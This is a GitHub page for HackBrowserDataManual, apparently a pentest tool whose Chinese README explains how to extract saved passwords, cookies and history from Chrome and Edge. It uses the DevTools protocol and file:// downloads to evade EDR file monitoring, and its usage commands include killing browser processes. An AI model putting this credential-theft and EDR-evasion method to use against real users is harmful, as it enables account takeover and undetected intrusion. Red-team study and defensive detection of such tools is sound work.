Skip to content
/ HackBrowserDataManual Public

Get password/cookie/history from browser and use devtools protocol to bypass edr monitoring

54 stars 9 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Z3ratu1/HackBrowserDataManual

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
browser
browser
 
 
crypto
crypto
 
 
data
data
 
 
item
item
 
 
utils
utils
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

HackBrowserDataManual

HackBrowserData的偏手动版,用于绕过特定情况下edr的限制

魔改自HackBrowserData
原理部分查看我的这篇博客HackBrowserDataManual开发日记 用于应对特殊情况下edr等软件监控了chrome的数据文件导致无法还原密码的问题
仅在本地win10,win11上实验通过(虽然理论上我感觉应该能在linux和Mac上运行)

使用Chrome DevTools Protocol控制浏览器,通过文件下载以及file协议等方式使用浏览器进程获取数据文件,绕过监控

需注意windows下浏览器密码解密需要DPAPI的参与,因此仅支持解密当前用户的密码,若提权至system权限,需手动窃取token等方式切换用户上下文
用户数据文件的定位是依赖于家目录的,非默认情况下同样需要自行指定用户数据文件位置

Disclaimer

本工具仅用于安全研究,提出一种edr监控浏览器文件后的绕过读取思路。 请勿使用于任何非法用途,严禁使用该项目对计算机信息系统进行攻击。由此产生的后果由使用者自行承担。

Build

与HackBrowserData相同,sqlite依赖需要CGO_ENABLED=1下编译

Usage

目前仅支持chrome和edge,理论上可以支持所有chromium内核的浏览器,但是我懒得整哈哈

$ ./HackBrowserDataManual.exe
extract password/history/cookie.
bypass edr monitor of browser data file by using Chromium devtools protocol

Usage:
  go_build_HackBrowserDataManual.exe [command]

Available Commands:
  devtool     Using dev tool protocol to extract cookies.
  download    download file via dev tool protocol
  help        Help about any command
  run         Parse browser cookie, password and history

Flags:
  -b, --browser string   browser(chrome/edge) (default "chrome")
  -h, --help             help for go_build_HackBrowserDataManual.exe
  -l, --log string       log level(info, error) (default "info")

Use "HackBrowserDataManual.exe [command] --help" for more information about a command.

run

run命令一把梭当前用户的浏览器密码,cookie和history

需注意cookie只有当不存在浏览器进程时才可获取。若存在浏览器进程,可使用--kill选项关闭所有浏览器进程

$ ./HackBrowserDataManual.exe help run
Parse browser cookie, password and history

Usage:
  go_build_HackBrowserDataManual.exe run [flags]
  go_build_HackBrowserDataManual.exe run [command]

Available Commands:
  cookie      Parse browser cookie file
  history     Parse browser history file
  password    Parse browser Password file

Flags:
  -f, --format string   Output format(csv/json) (default "csv")
  -h, --help            help for run

Global Flags:
  -b, --browser string   browser(chrome/edge) (default "chrome")
  -l, --log string       log level(info, error) (default "info")

examples

如下命令直接梭当前用户默认目录下的chrome密码,cookie和history

./HackBrowserDataManual.exe run

使用-b flag指定其他浏览器(目前只支持chrome和edge)

./HackBrowserDataManual.exe run -b edge

如果梭不通或者出问题可以使用其下的的cookie,history和password三个子命令单独获取数据。如:

./HackBrowserDataManual.exe run cookie

存在chrome进程需要关闭后才能获取cookie

./HackBrowserDataManual.exe run cookie --kill

指定输出文件名,使用run命令一把梭时不支持指定文件名

./HackBrowserDataManual.exe run cookie -o /output/filename

cookie文件和masterKey位于非常规位置时

./HackBrowserDataManual.exe run cookie -i /path/to/cookieFile -k /path/to/keyfile

devtools子命令使用devtools protocol直接从浏览器中还原全部cookie devtools命令user data dir位于非常规位置

./HackBrowserDataManual.exe devtools -d /user/dir

download子命令将制定文件下载到当前文件夹

./HackBrowserDataManual.exe download /path/to/downloadfile

About

Get password/cookie/history from browser and use devtools protocol to bypass edr monitoring

Topics

golang pentest-tools

Resources

Readme
Activity

Stars

54 stars

Watchers

2 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages